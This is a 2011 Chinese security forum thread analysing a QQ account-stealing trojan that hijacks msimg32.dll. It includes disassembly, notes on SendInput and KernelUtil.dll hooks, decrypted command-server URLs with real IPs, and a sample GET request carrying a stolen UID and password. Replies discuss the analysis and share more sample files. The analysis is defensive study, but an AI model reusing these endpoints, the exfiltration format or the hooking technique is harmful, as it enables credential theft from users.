[原创]最新QQ盗号木马分析,内含增肥术-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]最新QQ盗号木马分析,内含增肥术

发表于: 2011-6-14 00:44 33517

[原创]最新QQ盗号木马分析,内含增肥术

Mx￠Xgt

2011-6-14 00:44

33517

拿到这个样本时,他的名字叫"29.exe",拿起PEID查之,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],是个压缩壳,然后在看下他有没有附加数据,用Stud_PE查之,如果有,看来是木马生成器生成的!

OK.OD载入,ESP定律,迅速到达OEP!

00402310    6A 00           push    0
00402312    FF15 18204000   call    near dword ptr ds:[402018]       ; kernel32.GetModuleHandleA
00402318    A3 A4364000     mov     dword ptr ds:[4036A4], eax       ; 29.00400000
0040231D    FF15 14204000   call    near dword ptr ds:[402014]       ; kernel32.GetCommandLineA
00402323    6A 0A           push    0A
00402325    A3 A0364000     mov     dword ptr ds:[4036A0], eax       ; 29.00400000
0040232A    50              push    eax                              ; 29.00400000
0040232B    A1 A4364000     mov     eax, dword ptr ds:[4036A4]
00402330    6A 00           push    0
00402332    50              push    eax                              ; 29.00400000
00402333    E8 58000000     call    00402390

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

3.jpg （45.92kb，2013次下载）
2.jpg （56.09kb，2010次下载）
4.jpg （17.83kb，2006次下载）
5.jpg （36.93kb，2008次下载）
6.jpg （26.06kb，2002次下载）
29.rar （75.35kb，93次下载）

收藏・20

免费・7

支持

最新回复 (39) 1 2 ▶
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 2 楼在写此文之前我已经分析过了,要说明的是该DLL我们不能用OD单独分析,否则你不知道他干了什么,因为他只有被QQ.EXE载入他才会有所行为,所以我们要调试QQ才行,在此之前我们要修改一下msimg32.dll的入口,因为我们用OD载入QQ时,其DLL文件都被载入了,我们只需要在msimg32.dll入口修改成int3,然后设置取消OD对INT3的断点忽略: 不然载入时会悲剧的出现应用程序初始化失败的信息框提示: 设置好后,重新载入就会断在msimg32.dll入口上面了,把修改的字节改过来,重新设置EIP,开始分析. 因为之前分析过了,为了节约时间,大家先直接用BP CreateThread 下断,因为他的主体部分是从线程开始! 0012F85C 6300198D /CALL 到 CreateThread 来自 MSIMG32.6300198B 0012F860 00000000 \|pSecurity = NULL 0012F864 00000000 \|StackSize = 0 0012F868 63002D50 \|ThreadFunction = MSIMG32.63002D50 转到这里,下断 0012F86C 00000000 \|pThreadParm = NULL 0012F870 00000000 \|CreationFlags = 0 0012F874 00000000 \pThreadId = NULL 然后到达这里: 63002D50 83EC 10 sub esp, 10 63002D53 56 push esi ; kernel32.GetModuleHandleA 63002D54 57 push edi ; kernel32.Sleep 63002D55 E8 663A0000 call 630067C0 ; 里面有三个CALL,分别把用到的3个库中的API载入 63002D5A 8B35 18100063 mov esi, dword ptr ds:[63001018] ; kernel32.GetModuleHandleA 63002D60 B0 64 mov al, 64 63002D62 884424 13 mov byte ptr ss:[esp+13], al 63002D66 884424 0F mov byte ptr ss:[esp+F], al 63002D6A 8D4424 08 lea eax, dword ptr ss:[esp+8] 63002D6E B2 61 mov dl, 61 63002D70 B1 74 mov cl, 74 63002D72 50 push eax 63002D73 C705 70810063 1>mov dword ptr ds:[63008170], 12 63002D7D C64424 0E 53 mov byte ptr ss:[esp+E], 53 63002D82 885424 0F mov byte ptr ss:[esp+F], dl 63002D86 C64424 10 66 mov byte ptr ss:[esp+10], 66 63002D8B 884C24 15 mov byte ptr ss:[esp+15], cl 63002D8F C64424 16 2E mov byte ptr ss:[esp+16], 2E 63002D94 C64424 11 65 mov byte ptr ss:[esp+11], 65 63002D99 C64424 12 45 mov byte ptr ss:[esp+12], 45 63002D9E C64424 0C 54 mov byte ptr ss:[esp+C], 54 63002DA3 C64424 0D 53 mov byte ptr ss:[esp+D], 53 63002DA8 C64424 14 69 mov byte ptr ss:[esp+14], 69 63002DAD 885424 18 mov byte ptr ss:[esp+18], dl 63002DB1 884C24 19 mov byte ptr ss:[esp+19], cl 63002DB5 C64424 1A 00 mov byte ptr ss:[esp+1A], 0 63002DBA FFD6 call near esi ; 判断TSSafeEdit.dat是否已经被载入 63002DBC 8B3D 20100063 mov edi, dword ptr ds:[63001020] ; kernel32.Sleep 63002DC2 85C0 test eax, eax 63002DC4 75 12 jnz short 63002DD8 ; 如果还没有载入,就等待载入 63002DC6 68 F4010000 push 1F4 63002DCB FFD7 call near edi ; kernel32.Sleep 63002DCD 8D4C24 08 lea ecx, dword ptr ss:[esp+8] 63002DD1 51 push ecx 63002DD2 FFD6 call near esi ; kernel32.GetModuleHandleA 63002DD4 85C0 test eax, eax 63002DD6 ^ 74 EE je short 63002DC6 ; 直到TSSafeEdit被载入才执行下面的代码 63002DD8 E8 33ECFFFF call 63001A10 ; 内含VM,还没能力分析,是对TSSafeEdit的一些猥琐操作 63002DDD E8 3EEAFFFF call 63001820 ; 挂钩 SendInput[COLOR="Red"],手法挺妙的[/COLOR] 63002DE2 E8 F9EEFFFF call 63001CE0 ; 判断LoginCtrl.dll是否被载入,我当前是没有载入的情况,直接跳出 63002DE7 85C0 test eax, eax 63002DE9 75 0F jnz short 63002DFA ; MSIMG32.63002DFA 63002DEB C705 B8870063 0>mov dword ptr ds:[630087B8], 1 ; 记录"LoginCtrl.dll"没有载入 63002DF5 E8 56F7FFFF call 63002550 ; 对"KernelUtil.dll"部分地址进行挂钩,有VM,压力很大,无力分析 63002DFA E8 61000000 call 63002E60 ; 解密29.exe覆盖进的附加数据,解密算法很高级,[COLOR="Red"]求此算法名称[/COLOR]~ 0050F738 68 74 74 70 73 3A 2F 2F 31 32 31 2E 32 30 35 2E https://121.205. 0050F748 38 39 2E 32 31 31 3A 38 30 38 30 2F 64 64 2F 68 89.211:8080/dd/h 0050F758 6F 68 6F 2E 61 73 70 00 00 00 00 00 00 00 00 00 oho.asp......... 0050F768 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F778 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F788 00 00 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F ..........http:/ 0050F798 2F 32 32 32 2E 32 31 31 2E 36 34 2E 32 31 36 3A /222.211.64.216: 0050F7A8 38 37 2F 64 64 2F 61 73 70 78 2E 61 73 70 00 00 87/dd/aspx.asp.. 0050F7B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F7C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F7D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F7E8 00 00 00 00 68 74 74 70 73 3A 2F 2F 35 39 2E 36 ....https://59.6 0050F7F8 30 2E 32 31 2E 31 35 39 3A 34 30 30 30 2F 64 64 0.21.159:4000/dd 0050F808 2F 67 6F 2E 61 73 70 00 00 00 00 00 00 00 00 00 /go.asp......... 0050F818 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F828 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F838 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F848 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F858 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F868 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F878 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F888 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F898 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F 2F 00 ........http://. 0050F8A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8E8 00 00 00 00 00 00 00 00 64 64 00 00 00 00 00 00 ........dd...... 0050F8F8 00 00 73 64 66 73 00 00 00 00 00 00 00 00 00 00 ..sdfs.......... 0050F908 00 00 00 00 00 00 00 00 DE 00 3C 00 00 10 00 00 ........?<.... 0050F918 78 01 50 00 78 01 50 00 00 00 00 00 00 00 00 00 xP.xP......... 0050F928 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ https://121.205.89.211:8080/dd/hoho.asp http://222.211.64.216:87/dd/aspx.asp https://59.60.21.159:4000/dd/go.asp http:// dd sdfs 然后等登录成功后就会发送到目标地址如: GET dd/aspx.asp?Uid=1661129844&Upa=6161616138383838&B=0&D=0>=0&ll=ff&Fs=293FF4FE 上传的附件： SpxImage1.jpg （44.70kb，1868次下载） SpxImage2.jpg （41.44kb，1867次下载） SpxImage3.jpg （69.18kb，1865次下载） SpxImage4.jpg （71.06kb，1862次下载） 2011-6-14 00:46 0
hackboylyq 雪币： 160 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 48 粉丝 0 关注私信	hackboylyq 3 楼过来帮你顶下 2011-6-14 00:52 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 4 楼没看懂汇编代码啥意思 2011-6-14 12:08 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 5 楼已加入msimg32.dll 分析分析的很烂,凑合着看吧欢迎大家来做补充 2011-6-15 00:15 0
XPoy 雪币： 222 活跃值： (478) 能力值： ( LV11，RANK：188 ) 在线值：发帖 26 回帖 280 粉丝 5 关注私信	XPoy 3 6 楼分析的很妙。提到xuetr了，就应该用一下xuetr最猛最爽的一个功能啊应用层钩子->进程钩子->[952]QQ.exe->检测。这下爽到爆了吧!哈哈 2011-6-15 02:35 0
livexg 雪币： 11 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 88 粉丝 0 关注私信	livexg 7 楼分析很到位呀。。顶 2011-6-15 09:01 0
dayang 雪币： 220 活跃值： (726) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 8 楼 2个HTTP开头的应该是后门 2011-6-15 09:36 0
xiaoshut 雪币： 227 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	xiaoshut 9 楼盗吧盗吧,我还是新人 2011-6-15 09:44 0
dayang 雪币： 220 活跃值： (726) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 10 楼 https://121.205.89.211:8080/dd/hoho.asp http://222.211.64.216:87/dd/aspx.asp https://59.60.21.159:4000/dd/go.asp http:// dd sdfs 你这些数据是怎么解出来的呀？ 2011-6-15 18:19 0
lnheart 雪币： 777 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 120 粉丝 0 关注私信	lnheart 11 楼不错顶LZ一个 2011-6-15 18:24 0
guijian 雪币： 545 活跃值： (1507) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 122 粉丝 0 关注私信	guijian 12 楼希望能分析下，偷取 MM的地方。。。 2011-6-15 22:02 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 13 楼 63002DFA E8 61000000 call 63002E60 ; 解密29.exe覆盖进的附加数据,解密算法很高级,求此算法名称~ 2011-6-16 11:45 0
dayang 雪币： 220 活跃值： (726) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 14 楼 LZ不能还原出他的算法？ 2011-6-16 15:32 0
FishSeeWater 雪币： 768 活跃值： (535) 能力值： ( LV13，RANK：460 ) 在线值：发帖 60 回帖 860 粉丝 8 关注私信	FishSeeWater 11 15 楼欣赏楼主美文：） 2011-6-17 07:52 0
zyddyz 雪币： 436 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 13 回帖 43 粉丝 0 关注私信	zyddyz 16 楼跟着楼主学习了 2011-6-17 08:07 0
热火朝天雪币： 210 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 172 粉丝 0 关注私信	热火朝天 17 楼我主要看看我的杀软报不报 2011-6-17 08:39 0
majinxin 雪币： 163 活跃值： (75) 能力值： ( LV3，RANK：30 ) 在线值：发帖 8 回帖 130 粉丝 1 关注私信	majinxin 18 楼安置WM_KEYBOARD_LL钩子可以搞定 2011-6-17 09:36 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 19 楼支持一下 3q 2011-6-17 14:03 0
雪yaojun 雪币： 120 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 593 粉丝 0 关注私信	雪yaojun 20 楼好文。。。这才是真正的病毒分析。 2011-6-17 14:13 0
okman 雪币： 230 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	okman 21 楼几天前去了广东，朋友在我的电脑上网，我的电脑也中招了。回来上网，三个QQ都被盗了。有两个号有一代的密码保护，但申请后就没用过，不太记得，试了好多次才申诉成功。但还有一个小号，平时很少登录，说是没在经常登录的地点登录，改不了密码。而且没搞密保，申诉了N次都搞不回来。浪费我三天了。我打开网络监控，发现登录QQ的后不久，QQ会向以下IP发送数据，比较可疑。 121.14.100.184:80 中山市 121.205.89.211:8080 福建省 222.211.64.216:87 四川成都 183.60.3.162 222.186.19.19：80 江苏镇江 124.115.2.219：443 陕西西安 220.170.192.10：80 湖南邵阳看了楼主的文章，我发现在我的QQ文件夹下的BIN子文件夹下，确实有一个msimg32.dll文件，是隐藏的，有25.0MB（刚好25M)，创建日期和其它的dll文件也不一样。但是压缩以后只有207KB 传上来让大家研究一下。上传的附件： msimg32病毒样本.rar （207.62kb，16次下载） 2011-6-18 22:09 0
loongboy 雪币： 105 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 97 粉丝 0 关注私信	loongboy 22 楼我竟然奇迹地略读了一遍佩服我自己哈顺便支持下楼主 2011-6-18 22:31 0
lizhenzhe 雪币： 500 活跃值： (1000) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 186 粉丝 0 关注私信	lizhenzhe 23 楼我来膜拜楼主 2011-6-18 22:43 0
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 142 关注私信	熊猫正正 9 24 楼过来学习~~ 2011-6-18 23:11 0
夜星海雪币： 270 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 45 粉丝 0 关注私信	夜星海 25 楼熊猫小正正也出动了 2011-6-21 23:14 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Mx￠Xgt

发帖

583

回帖

360

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (39) 1 2 ▶
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 2 楼在写此文之前我已经分析过了,要说明的是该DLL我们不能用OD单独分析,否则你不知道他干了什么,因为他只有被QQ.EXE载入他才会有所行为,所以我们要调试QQ才行,在此之前我们要修改一下msimg32.dll的入口,因为我们用OD载入QQ时,其DLL文件都被载入了,我们只需要在msimg32.dll入口修改成int3,然后设置取消OD对INT3的断点忽略: 不然载入时会悲剧的出现应用程序初始化失败的信息框提示: 设置好后,重新载入就会断在msimg32.dll入口上面了,把修改的字节改过来,重新设置EIP,开始分析. 因为之前分析过了,为了节约时间,大家先直接用BP CreateThread 下断,因为他的主体部分是从线程开始! 0012F85C 6300198D /CALL 到 CreateThread 来自 MSIMG32.6300198B 0012F860 00000000 \|pSecurity = NULL 0012F864 00000000 \|StackSize = 0 0012F868 63002D50 \|ThreadFunction = MSIMG32.63002D50 转到这里,下断 0012F86C 00000000 \|pThreadParm = NULL 0012F870 00000000 \|CreationFlags = 0 0012F874 00000000 \pThreadId = NULL 然后到达这里: 63002D50 83EC 10 sub esp, 10 63002D53 56 push esi ; kernel32.GetModuleHandleA 63002D54 57 push edi ; kernel32.Sleep 63002D55 E8 663A0000 call 630067C0 ; 里面有三个CALL,分别把用到的3个库中的API载入 63002D5A 8B35 18100063 mov esi, dword ptr ds:[63001018] ; kernel32.GetModuleHandleA 63002D60 B0 64 mov al, 64 63002D62 884424 13 mov byte ptr ss:[esp+13], al 63002D66 884424 0F mov byte ptr ss:[esp+F], al 63002D6A 8D4424 08 lea eax, dword ptr ss:[esp+8] 63002D6E B2 61 mov dl, 61 63002D70 B1 74 mov cl, 74 63002D72 50 push eax 63002D73 C705 70810063 1>mov dword ptr ds:[63008170], 12 63002D7D C64424 0E 53 mov byte ptr ss:[esp+E], 53 63002D82 885424 0F mov byte ptr ss:[esp+F], dl 63002D86 C64424 10 66 mov byte ptr ss:[esp+10], 66 63002D8B 884C24 15 mov byte ptr ss:[esp+15], cl 63002D8F C64424 16 2E mov byte ptr ss:[esp+16], 2E 63002D94 C64424 11 65 mov byte ptr ss:[esp+11], 65 63002D99 C64424 12 45 mov byte ptr ss:[esp+12], 45 63002D9E C64424 0C 54 mov byte ptr ss:[esp+C], 54 63002DA3 C64424 0D 53 mov byte ptr ss:[esp+D], 53 63002DA8 C64424 14 69 mov byte ptr ss:[esp+14], 69 63002DAD 885424 18 mov byte ptr ss:[esp+18], dl 63002DB1 884C24 19 mov byte ptr ss:[esp+19], cl 63002DB5 C64424 1A 00 mov byte ptr ss:[esp+1A], 0 63002DBA FFD6 call near esi ; 判断TSSafeEdit.dat是否已经被载入 63002DBC 8B3D 20100063 mov edi, dword ptr ds:[63001020] ; kernel32.Sleep 63002DC2 85C0 test eax, eax 63002DC4 75 12 jnz short 63002DD8 ; 如果还没有载入,就等待载入 63002DC6 68 F4010000 push 1F4 63002DCB FFD7 call near edi ; kernel32.Sleep 63002DCD 8D4C24 08 lea ecx, dword ptr ss:[esp+8] 63002DD1 51 push ecx 63002DD2 FFD6 call near esi ; kernel32.GetModuleHandleA 63002DD4 85C0 test eax, eax 63002DD6 ^ 74 EE je short 63002DC6 ; 直到TSSafeEdit被载入才执行下面的代码 63002DD8 E8 33ECFFFF call 63001A10 ; 内含VM,还没能力分析,是对TSSafeEdit的一些猥琐操作 63002DDD E8 3EEAFFFF call 63001820 ; 挂钩 SendInput[COLOR="Red"],手法挺妙的[/COLOR] 63002DE2 E8 F9EEFFFF call 63001CE0 ; 判断LoginCtrl.dll是否被载入,我当前是没有载入的情况,直接跳出 63002DE7 85C0 test eax, eax 63002DE9 75 0F jnz short 63002DFA ; MSIMG32.63002DFA 63002DEB C705 B8870063 0>mov dword ptr ds:[630087B8], 1 ; 记录"LoginCtrl.dll"没有载入 63002DF5 E8 56F7FFFF call 63002550 ; 对"KernelUtil.dll"部分地址进行挂钩,有VM,压力很大,无力分析 63002DFA E8 61000000 call 63002E60 ; 解密29.exe覆盖进的附加数据,解密算法很高级,[COLOR="Red"]求此算法名称[/COLOR]~ 0050F738 68 74 74 70 73 3A 2F 2F 31 32 31 2E 32 30 35 2E https://121.205. 0050F748 38 39 2E 32 31 31 3A 38 30 38 30 2F 64 64 2F 68 89.211:8080/dd/h 0050F758 6F 68 6F 2E 61 73 70 00 00 00 00 00 00 00 00 00 oho.asp......... 0050F768 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F778 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F788 00 00 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F ..........http:/ 0050F798 2F 32 32 32 2E 32 31 31 2E 36 34 2E 32 31 36 3A /222.211.64.216: 0050F7A8 38 37 2F 64 64 2F 61 73 70 78 2E 61 73 70 00 00 87/dd/aspx.asp.. 0050F7B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F7C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F7D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F7E8 00 00 00 00 68 74 74 70 73 3A 2F 2F 35 39 2E 36 ....https://59.6 0050F7F8 30 2E 32 31 2E 31 35 39 3A 34 30 30 30 2F 64 64 0.21.159:4000/dd 0050F808 2F 67 6F 2E 61 73 70 00 00 00 00 00 00 00 00 00 /go.asp......... 0050F818 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F828 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F838 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F848 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F858 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F868 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F878 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F888 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F898 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F 2F 00 ........http://. 0050F8A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0050F8E8 00 00 00 00 00 00 00 00 64 64 00 00 00 00 00 00 ........dd...... 0050F8F8 00 00 73 64 66 73 00 00 00 00 00 00 00 00 00 00 ..sdfs.......... 0050F908 00 00 00 00 00 00 00 00 DE 00 3C 00 00 10 00 00 ........?<.... 0050F918 78 01 50 00 78 01 50 00 00 00 00 00 00 00 00 00 xP.xP......... 0050F928 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ https://121.205.89.211:8080/dd/hoho.asp http://222.211.64.216:87/dd/aspx.asp https://59.60.21.159:4000/dd/go.asp http:// dd sdfs 然后等登录成功后就会发送到目标地址如: GET dd/aspx.asp?Uid=1661129844&Upa=6161616138383838&B=0&D=0>=0&ll=ff&Fs=293FF4FE 上传的附件： SpxImage1.jpg （44.70kb，1868次下载） SpxImage2.jpg （41.44kb，1867次下载） SpxImage3.jpg （69.18kb，1865次下载） SpxImage4.jpg （71.06kb，1862次下载） 2011-6-14 00:46 0
hackboylyq 雪币： 160 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 48 粉丝 0 关注私信	hackboylyq 3 楼过来帮你顶下 2011-6-14 00:52 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 4 楼没看懂汇编代码啥意思 2011-6-14 12:08 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 5 楼已加入msimg32.dll 分析分析的很烂,凑合着看吧欢迎大家来做补充 2011-6-15 00:15 0
XPoy 雪币： 222 活跃值： (478) 能力值： ( LV11，RANK：188 ) 在线值：发帖 26 回帖 280 粉丝 5 关注私信	XPoy 3 6 楼分析的很妙。提到xuetr了，就应该用一下xuetr最猛最爽的一个功能啊应用层钩子->进程钩子->[952]QQ.exe->检测。这下爽到爆了吧!哈哈 2011-6-15 02:35 0
livexg 雪币： 11 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 88 粉丝 0 关注私信	livexg 7 楼分析很到位呀。。顶 2011-6-15 09:01 0
dayang 雪币： 220 活跃值： (726) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 8 楼 2个HTTP开头的应该是后门 2011-6-15 09:36 0
xiaoshut 雪币： 227 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	xiaoshut 9 楼盗吧盗吧,我还是新人 2011-6-15 09:44 0
dayang 雪币： 220 活跃值： (726) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 10 楼 https://121.205.89.211:8080/dd/hoho.asp http://222.211.64.216:87/dd/aspx.asp https://59.60.21.159:4000/dd/go.asp http:// dd sdfs 你这些数据是怎么解出来的呀？ 2011-6-15 18:19 0
lnheart 雪币： 777 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 120 粉丝 0 关注私信	lnheart 11 楼不错顶LZ一个 2011-6-15 18:24 0
guijian 雪币： 545 活跃值： (1507) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 122 粉丝 0 关注私信	guijian 12 楼希望能分析下，偷取 MM的地方。。。 2011-6-15 22:02 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 13 楼 63002DFA E8 61000000 call 63002E60 ; 解密29.exe覆盖进的附加数据,解密算法很高级,求此算法名称~ 2011-6-16 11:45 0
dayang 雪币： 220 活跃值： (726) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 14 楼 LZ不能还原出他的算法？ 2011-6-16 15:32 0
FishSeeWater 雪币： 768 活跃值： (535) 能力值： ( LV13，RANK：460 ) 在线值：发帖 60 回帖 860 粉丝 8 关注私信	FishSeeWater 11 15 楼欣赏楼主美文：） 2011-6-17 07:52 0
zyddyz 雪币： 436 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 13 回帖 43 粉丝 0 关注私信	zyddyz 16 楼跟着楼主学习了 2011-6-17 08:07 0
热火朝天雪币： 210 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 172 粉丝 0 关注私信	热火朝天 17 楼我主要看看我的杀软报不报 2011-6-17 08:39 0
majinxin 雪币： 163 活跃值： (75) 能力值： ( LV3，RANK：30 ) 在线值：发帖 8 回帖 130 粉丝 1 关注私信	majinxin 18 楼安置WM_KEYBOARD_LL钩子可以搞定 2011-6-17 09:36 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 19 楼支持一下 3q 2011-6-17 14:03 0
雪yaojun 雪币： 120 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 593 粉丝 0 关注私信	雪yaojun 20 楼好文。。。这才是真正的病毒分析。 2011-6-17 14:13 0
okman 雪币： 230 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	okman 21 楼几天前去了广东，朋友在我的电脑上网，我的电脑也中招了。回来上网，三个QQ都被盗了。有两个号有一代的密码保护，但申请后就没用过，不太记得，试了好多次才申诉成功。但还有一个小号，平时很少登录，说是没在经常登录的地点登录，改不了密码。而且没搞密保，申诉了N次都搞不回来。浪费我三天了。我打开网络监控，发现登录QQ的后不久，QQ会向以下IP发送数据，比较可疑。 121.14.100.184:80 中山市 121.205.89.211:8080 福建省 222.211.64.216:87 四川成都 183.60.3.162 222.186.19.19：80 江苏镇江 124.115.2.219：443 陕西西安 220.170.192.10：80 湖南邵阳看了楼主的文章，我发现在我的QQ文件夹下的BIN子文件夹下，确实有一个msimg32.dll文件，是隐藏的，有25.0MB（刚好25M)，创建日期和其它的dll文件也不一样。但是压缩以后只有207KB 传上来让大家研究一下。上传的附件： msimg32病毒样本.rar （207.62kb，16次下载） 2011-6-18 22:09 0
loongboy 雪币： 105 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 97 粉丝 0 关注私信	loongboy 22 楼我竟然奇迹地略读了一遍佩服我自己哈顺便支持下楼主 2011-6-18 22:31 0
lizhenzhe 雪币： 500 活跃值： (1000) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 186 粉丝 0 关注私信	lizhenzhe 23 楼我来膜拜楼主 2011-6-18 22:43 0
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 142 关注私信	熊猫正正 9 24 楼过来学习~~ 2011-6-18 23:11 0
夜星海雪币： 270 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 45 粉丝 0 关注私信	夜星海 25 楼熊猫小正正也出动了 2011-6-21 23:14 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复